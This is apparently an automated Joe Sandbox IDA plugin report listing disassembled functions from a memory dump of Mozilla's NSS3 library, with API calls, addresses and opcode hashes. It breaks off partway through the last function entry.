Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: CriticalSection$UnlockValue$Arena_DeleteEnterFreeLeaveUtilfree
String ID:
API String ID: 1628394932-0
Opcode ID: 33bafcb191dc5e57fcab781d8048a3377c35183da23d296382ad5b4dba3f84d6
Instruction ID: bf2276c8f3fbf0ad5089ee92bdd349eda0a17f08e893aa10cfbb8e474de400ec
Opcode Fuzzy Hash: 33bafcb191dc5e57fcab781d8048a3377c35183da23d296382ad5b4dba3f84d6
Instruction Fuzzy Hash: 54115EB5605B158FEB00AFB8D48856EBBF4FF06344F054568D898DB741EB34E488CB92

Function 6CAE0FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA887ED,00000800,6CA7EF74,00000000), ref: 6CAE1000
PR_NewLock.NSS3(?,00000800,6CA7EF74,00000000), ref: 6CAE1016

Part of subcall function 6CB498D0: calloc.MOZGLUE(00000001,00000084,6CA70936,00000001,?,6CA7102C), ref: 6CB498E5

PL_InitArenaPool.NSS3(00000000,security,6CA887ED,00000008,?,00000800,6CA7EF74,00000000), ref: 6CAE102B
TlsGetValue.KERNEL32(00000000,?,?,6CA887ED,00000800,6CA7EF74,00000000), ref: 6CAE1044
free.MOZGLUE(00000000,?,00000800,6CA7EF74,00000000), ref: 6CAE1064

Strings

security, xrefs: 6CAE1025

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: calloc$ArenaInitLockPoolValuefree
String ID: security
API String ID: 3379159031-3315324353
Opcode ID: d3508202a320b3f0bc1f2c491f85bca4e591ad39462cb7fa8cec55d52104e850
Instruction ID: 2cbf748979ba71c3ade7174610fa179b7542365cf9188e409757dd7078629627
Opcode Fuzzy Hash: d3508202a320b3f0bc1f2c491f85bca4e591ad39462cb7fa8cec55d52104e850
Instruction Fuzzy Hash: 0B010875A402605BE7203F3C9C057663778BF0A799F050115EA0897E53EB71D1D4EBE1

Function 6CB9CBE0 Relevance: 10.5, APIs: 7, Instructions: 46COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000010), ref: 6CB9CBEA
PR_NewLock.NSS3 ref: 6CB9CBF9

Part of subcall function 6CB498D0: calloc.MOZGLUE(00000001,00000084,6CA70936,00000001,?,6CA7102C), ref: 6CB498E5

PR_NewCondVar.NSS3(00000000), ref: 6CB9CC05

Part of subcall function 6CA6BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6CA721BC), ref: 6CA6BB8C

free.MOZGLUE(00000000), ref: 6CB9CC1C
DeleteCriticalSection.KERNEL32(-0000001C), ref: 6CB9CC34
free.MOZGLUE(00000000), ref: 6CB9CC41
free.MOZGLUE(00000000), ref: 6CB9CC47

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: callocfree$CondCriticalDeleteLockSection
String ID:
API String ID: 687540378-0
Opcode ID: ddfcc3e50cfef54c00e060fc6c036f3942ee521c2ecbf0d8a1b80bb2ac1c55af
Instruction ID: e3f4e2ef712beb52d5ea0c0c96c233390f428518b275063e2d4362e21519aa1e
Opcode Fuzzy Hash: ddfcc3e50cfef54c00e060fc6c036f3942ee521c2ecbf0d8a1b80bb2ac1c55af
Instruction Fuzzy Hash: D0F0C2717012115BE6007B7DAC55A9B3BACDF466E9F040434E949C3B42EA21E414C7F6

Function 6CB9C9B0 Relevance: 10.5, APIs: 7, Instructions: 45COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(00000000,6CB11AB6,00000000,?,?,6CB107B9,?), ref: 6CB9C9C6
free.MOZGLUE(?,?,6CB107B9,?), ref: 6CB9C9D3
DeleteCriticalSection.KERNEL32(00000000,00000001), ref: 6CB9C9E5
free.MOZGLUE(?), ref: 6CB9C9EC
DeleteCriticalSection.KERNEL32(00000080), ref: 6CB9C9F8
free.MOZGLUE(?), ref: 6CB9C9FF
free.MOZGLUE(00000000), ref: 6CB9CA0B

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: 89a8eceaf40b415adae4009f07b99c15de27c9a993d882ce55898bdf0cbcc9d1
Instruction ID: fda11aeae4f03c8057a0d3f2baa44ad30b7a3f86ce550feb913489e0f0adc6bc
Opcode Fuzzy Hash: 89a8eceaf40b415adae4009f07b99c15de27c9a993d882ce55898bdf0cbcc9d1
Instruction Fuzzy Hash: 75014BB6600A09ABDB00EFB4CC88897B7BCFE4A2613044526E906C3600EB35F459CBE1

Function 6CB22E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000), ref: 6CB23046

Part of subcall function 6CB0EE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB0EE85

PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6CAF7FFB), ref: 6CB2312A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CB23154
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CB22E8B

Part of subcall function 6CB2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB2C2BF

Part of subcall function 6CB0F110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6CAF9BFF,?,00000000,00000000), ref: 6CB0F134

memcpy.VCRUNTIME140(8B3C75C0,?,6CAF7FFA), ref: 6CB22EA4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB2317B

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Error$memcpy$K11_Value
String ID:
API String ID: 2334702667-0
Opcode ID: 368043beedb4be725ee6c4af9f939dab8086544b550d7b9ef65dfbb9856173fb
Instruction ID: 39c3b5a58b6016e1997fc9b8841d8839e52509a710d8aae45214e8ceda84adb3
Opcode Fuzzy Hash: 368043beedb4be725ee6c4af9f939dab8086544b550d7b9ef65dfbb9856173fb
Instruction Fuzzy Hash: 78A19B71A002589FDB24CF54CC80BEEB7B5EF49318F048199E94DA7741E735AA85CFA2

Function 6CADA970 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcf95d4ced4627e8193f220331e3b5890d3e5132dd0423a853cce92a92fff77a
Instruction ID: c5398c5596ae675c2d3a6cc8e17abb0d3baf479d157a41433be6e599e5127e2b
Opcode Fuzzy Hash: fcf95d4ced4627e8193f220331e3b5890d3e5132dd0423a853cce92a92fff77a
Instruction Fuzzy Hash: 1C914D31D041684BCB258E1888917DEB7B7AF4A31CF1E81E9C5999BA01D631AEC5CFD1

Function 6CAEED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6CAEED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6CAEEDCE

Part of subcall function 6CAE0BE0: malloc.MOZGLUE(6CAD8D2D,?,00000000,?), ref: 6CAE0BF8
Part of subcall function 6CAE0BE0: TlsGetValue.KERNEL32(6CAD8D2D,?,00000000,?), ref: 6CAE0C15

free.MOZGLUE(00000000,?,?,?,?,6CAEB04F), ref: 6CAEEE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CAEEECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CAEEEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CAEEEFB

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID:
API String ID: 3768380896-0
Opcode ID: 1d8edb8369bea5977c07aa1fa93d0f405156c15e8eec73debd564e43c70db34d
Instruction ID: 8af12865bba9ab09c0a6116a854bc1f5f64fae732ea0766ce92e671cf06275b1
Opcode Fuzzy Hash: 1d8edb8369bea5977c07aa1fa93d0f405156c15e8eec73debd564e43c70db34d
Instruction Fuzzy Hash: 5C8179B5A002059FEB14CF59DD84AAB77F5AF8C308F18442CE8159B751DB30E998DBE1

Function 6CAECCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CAEC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CAEDAE2,?), ref: 6CAEC6C2

PR_Now.NSS3 ref: 6CAECD35

Part of subcall function 6CB49DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CB90A27), ref: 6CB49DC6
Part of subcall function 6CB49DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CB90A27), ref: 6CB49DD1
Part of subcall function 6CB49DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB49DED

Part of subcall function 6CAD6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CA81C6F,00000000,00000004,?,?), ref: 6CAD6C3F

PR_GetCurrentThread.NSS3 ref: 6CAECD54

Part of subcall function 6CB49BF0: TlsGetValue.KERNEL32(?,?,?,6CB90A75), ref: 6CB49C07

Part of subcall function 6CAD7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CA81CCC,00000000,00000000,?,?), ref: 6CAD729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CAECD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6CAECE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6CAECE2C

Part of subcall function 6CAE10C0: TlsGetValue.KERNEL32(?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE10F3
Part of subcall function 6CAE10C0: EnterCriticalSection.KERNEL32(?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE110C
Part of subcall function 6CAE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE1141
Part of subcall function 6CAE10C0: PR_Unlock.NSS3(?,?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE1182
Part of subcall function 6CAE10C0: TlsGetValue.KERNEL32(?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6CAECE40

Part of subcall function 6CAE14C0: TlsGetValue.KERNEL32 ref: 6CAE14E0
Part of subcall function 6CAE14C0: EnterCriticalSection.KERNEL32 ref: 6CAE14F5
Part of subcall function 6CAE14C0: PR_Unlock.NSS3 ref: 6CAE150D

Part of subcall function 6CAECEE0: PORT_ArenaMark_Util.NSS3(?,6CAECD93,?), ref: 6CAECEEE
Part of subcall function 6CAECEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CAECD93,?), ref: 6CAECEFC
Part of subcall function 6CAECEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CAECD93,?), ref: 6CAECF0B
Part of subcall function 6CAECEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CAECD93,?), ref: 6CAECF1D

Part of subcall function 6CAECEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CAECD93,?), ref: 6CAECF47
Part of subcall function 6CAECEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CAECD93,?), ref: 6CAECF67
Part of subcall function 6CAECEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6CAECD93,?,?,?,?,?,?,?,?,?,?,?,6CAECD93,?), ref: 6CAECF78

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: 47b223fed4e2c27c2fcccafbbb7c3228ad0c237bbafcb909fe9ac5c86277ddb2
Instruction ID: 1c682e22e53d25bd3ecabdd5661c003178d7e2375f96c06600be94e29c9c2b63
Opcode Fuzzy Hash: 47b223fed4e2c27c2fcccafbbb7c3228ad0c237bbafcb909fe9ac5c86277ddb2
Instruction Fuzzy Hash: 5951C0B2A002109BEB10DF69DC40BAA7BF4AF4C34CF290524D91497741EB31ED89DBD1

Function 6CAE8BA0 Relevance: 9.2, APIs: 6, Instructions: 150memorythreadCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3 ref: 6CAE8BCD

Part of subcall function 6CAE14C0: TlsGetValue.KERNEL32 ref: 6CAE14E0
Part of subcall function 6CAE14C0: EnterCriticalSection.KERNEL32 ref: 6CAE14F5
Part of subcall function 6CAE14C0: PR_Unlock.NSS3 ref: 6CAE150D

PORT_ArenaGrow_Util.NSS3(?,?,?), ref: 6CAE8BF9

Part of subcall function 6CAE1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6CA8895A,00000000,?,00000000,?,00000000,?,00000000,?,6CA7F599,?,00000000), ref: 6CAE136A
Part of subcall function 6CAE1340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6CA8895A,00000000,?,00000000,?,00000000,?,00000000,?,6CA7F599,?,00000000), ref: 6CAE137E
Part of subcall function 6CAE1340: PL_ArenaGrow.NSS3(?,6CA7F599,?,00000000,?,6CA8895A,00000000,?,00000000,?,00000000,?,00000000,?,6CA7F599,?), ref: 6CAE13CF
Part of subcall function 6CAE1340: PR_Unlock.NSS3(?,?,6CA8895A,00000000,?,00000000,?,00000000,?,00000000,?,6CA7F599,?,00000000), ref: 6CAE145C

PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CAE8C38
PORT_ArenaAlloc_Util.NSS3(?,00000050), ref: 6CAE8C59
PR_GetCurrentThread.NSS3 ref: 6CAE8D33
PR_GetCurrentThread.NSS3 ref: 6CAE8D59

Part of subcall function 6CB49BF0: TlsGetValue.KERNEL32(?,?,?,6CB90A75), ref: 6CB49C07

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Arena$Util$Value$Alloc_CriticalCurrentEnterSectionThreadUnlock$GrowGrow_Mark_
String ID:
API String ID: 3225201373-0
Opcode ID: 9643a12f5ef9be9383f5a07645f6046aeb8b00bebfe388031ff8c43a976bbbc5
Instruction ID: 69794959a28cd43aac9e23078d509bccf3d799c9eb307b860ce62f972cb4c92d
Opcode Fuzzy Hash: 9643a12f5ef9be9383f5a07645f6046aeb8b00bebfe388031ff8c43a976bbbc5
Instruction Fuzzy Hash: CE6106B4A016119FDB04CF19D580B617BE0FF5C308F1582AAE9488BB62EB71E994DFD0

Function 6CAE6A70 Relevance: 9.1, APIs: 6, Instructions: 137COMMON

Download Yara Rule

APIs

DER_GetInteger_Util.NSS3(?), ref: 6CAE6ABF

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Integer_Util
String ID:
API String ID: 2649942920-0
Opcode ID: 819ff89c9e36111ce77ccfac001e364c489c782101be190fc11981380c9a89c2
Instruction ID: 750c35935eae3568d49f70cbe2f0660932e85b5f3152e44aed7dd4dfd1efecc3
Opcode Fuzzy Hash: 819ff89c9e36111ce77ccfac001e364c489c782101be190fc11981380c9a89c2
Instruction Fuzzy Hash: F0516AB09417088FEB208F29D941B977BE4EF48318F14496DE59EC7B52E731E488DB91

Function 6CABEEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6CABEF38

Part of subcall function 6CAA9520: PK11_IsLoggedIn.NSS3(00000000,?,6CAD379E,?,00000001,?), ref: 6CAA9542

PK11_Authenticate.NSS3(?,00000001,?), ref: 6CABEF53

Part of subcall function 6CAC4C20: TlsGetValue.KERNEL32 ref: 6CAC4C4C
Part of subcall function 6CAC4C20: EnterCriticalSection.KERNEL32(?), ref: 6CAC4C60
Part of subcall function 6CAC4C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CAC4CA1
Part of subcall function 6CAC4C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CAC4CBE
Part of subcall function 6CAC4C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CAC4CD2
Part of subcall function 6CAC4C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAC4D3A

PR_GetCurrentThread.NSS3 ref: 6CABEF9E

Part of subcall function 6CB49BF0: TlsGetValue.KERNEL32(?,?,?,6CB90A75), ref: 6CB49C07

free.MOZGLUE(00000000), ref: 6CABEFC3
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CABF016
free.MOZGLUE(00000000), ref: 6CABF022

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
String ID:
API String ID: 2459274275-0
Opcode ID: 6d86dfc00a34dbd3902a326170ead4002b6d0cb9403459f537217b1cb11f4429
Instruction ID: ebce03e8c5abc431d2c753868cba9d1098ae2ad637364f60c8b177c4f86ae0f6
Opcode Fuzzy Hash: 6d86dfc00a34dbd3902a326170ead4002b6d0cb9403459f537217b1cb11f4429
Instruction Fuzzy Hash: F6418375E00109ABDF018FA9DC85BEE7BB9AF48358F044029F914A7350F772D959CBA1

Function 6CA94860 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA94894

Part of subcall function 6CADB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBB18D0,?), ref: 6CADB095

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA948CA
SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA948DD
SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?), ref: 6CA948FF
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CA94912
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA9494A

Part of subcall function 6CB2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB2C2BF

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$AlgorithmTag_$DecodeErrorItem_Quick$Value
String ID:
API String ID: 759476665-0
Opcode ID: ee39cc1b16724a4630eafd23116b66b64a881c8a1a5691e1abbcf971783c7382
Instruction ID: b8ed2379f69d2976766ea8b4229958324f9a150783dd02ef809e4f325800d589
Opcode Fuzzy Hash: ee39cc1b16724a4630eafd23116b66b64a881c8a1a5691e1abbcf971783c7382
Instruction Fuzzy Hash: 9A41D6706143456BE700CF69D986BAB73E89F4431CF08462CFA6597741F770E988CB52

Function 6CB18AF0 Relevance: 9.1, APIs: 6, Instructions: 120COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000159,00000000,00000000,?,?,6CB06F38), ref: 6CB18B0B
NSS_OptionGet.NSS3(00000008,?), ref: 6CB18B58
NSS_OptionGet.NSS3(00000009,?), ref: 6CB18B6A
NSS_GetAlgorithmPolicy.NSS3(00000159,00000000,?,?,00000000,?,?,6CB06F38), ref: 6CB18BBB
NSS_OptionGet.NSS3(0000000A,?), ref: 6CB18C08
NSS_OptionGet.NSS3(0000000B,?), ref: 6CB18C1A

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Option$AlgorithmPolicy
String ID:
API String ID: 927613807-0
Opcode ID: 7f5ee12cdc1e772966721dac82287bbd9b1d095093a1745e51ee006fc0de4b39
